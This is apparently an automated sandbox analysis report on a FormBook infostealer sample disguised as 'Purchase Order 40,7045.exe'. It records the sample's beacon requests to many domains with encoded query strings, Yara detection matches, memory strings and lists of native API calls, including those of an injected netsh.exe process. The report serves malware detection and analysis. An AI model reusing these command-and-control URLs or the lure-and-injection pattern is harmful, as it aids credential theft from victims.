Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=EbC/lMdsFrxYIRmxU9JVdurtFZV4D4JG65XX9u0TQDrH/vXXo4aXqz2TK/FSo60698x+ HTTP/1.1Host: www.coveloungewineandwhiskey.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=cBWwxeNBZw14c0R1jn0Ws/yQjDXlXErbhexqVqcZJ/j9HX594bSs/9hubjzw4SjFPh4C&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.covid19salivatestdirect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=gtAjDyhewVv0wP+pLldDDzZVOHZuvXFhM8dcKQ7x+XbEhwRlJbrCtCBURlOjpb7ofbaF&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.primeworldgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MP3xgLgHQaOW HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oBU/CZqG/X0&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.hyx20140813.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=+vzchlDpP8hhVSy3W5GjgGJ1ZPT8aqTFt8VTi3L78WqIr+4DtdDaKL74hph6Iza73r7P HTTP/1.1Host: www.obsessingwealth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.cashintl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=hBI3Otxb8cB+II9lzJ/uJul9cug51W/gKrRcuXZMLk1SgBX4+5ai4onE9bbZmy8EPFIt HTTP/1.1Host: www.namofast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=SGVuGExhnGF4yxDyK5xX6Vc4jl6qy7oMTqbPjfmzMsQE0E0I89iRcikd677eURgEdiQj&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.plantpowered.energyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=iX1DJYif3eJ2qCI9y9y3neEoNBEbwEqOJ7CoPPWNank/pdm5KGiwxeIXvmA+SDcpynqB&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.capitalcitybombers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEaROkrMNd5 HTTP/1.1Host: www.chemtradent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1Host: www.ownumo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.ownumo.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Sat, 21 Nov 2020 08:23:14 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7

Source: netsh.exe, 00000003.00000002.500404825.000000000419D000.00000004.00000001.sdmp	String found in binary or memory: http://browsehappy.com/
Source: explorer.exe, 00000002.00000000.252788264.000000000F640000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: Purchase Order 40,7045.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Purchase Order 40,7045.exe

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417BA0 NtCreateFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417C50 NtReadFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417CD0 NtClose,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417D80 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417C4C NtReadFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00417CCA NtClose,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012399A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012398F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012395D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012397A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012396E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239950 NtQueueApcThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012399D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239820 NtEnumerateKey,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123B040 NtSuspendThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012398A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239B00 NtSetValueKey,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239A10 NtQuerySection,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239560 NtWriteFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012395F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239760 NtOpenProcess,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239770 NtSetInformationFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123A770 NtOpenThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01239650 NtQueryValueKey,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012396D0 NtCreateKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039599A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039596D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039596E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039595D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959A10 NtQuerySection,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959A20 NtResumeThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039599D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039598A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039598F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039597A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395A770 NtOpenThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959760 NtOpenProcess,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959660 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039595F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03959560 NtWriteFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE7BA0 NtCreateFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE7CD0 NtClose,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE7C50 NtReadFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE7CCA NtClose,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE7C4C NtReadFile,

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0086F895
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00876098
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00876808
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0087B14E
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0087BBF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00876BF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0087DCD9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00875C03
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00876436
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0087B69F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0087CFA1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0086A7E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00401030
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041C16E
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00408A40
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00408A3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041C52F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00402D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00402D90
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041BF03
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00402FB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120
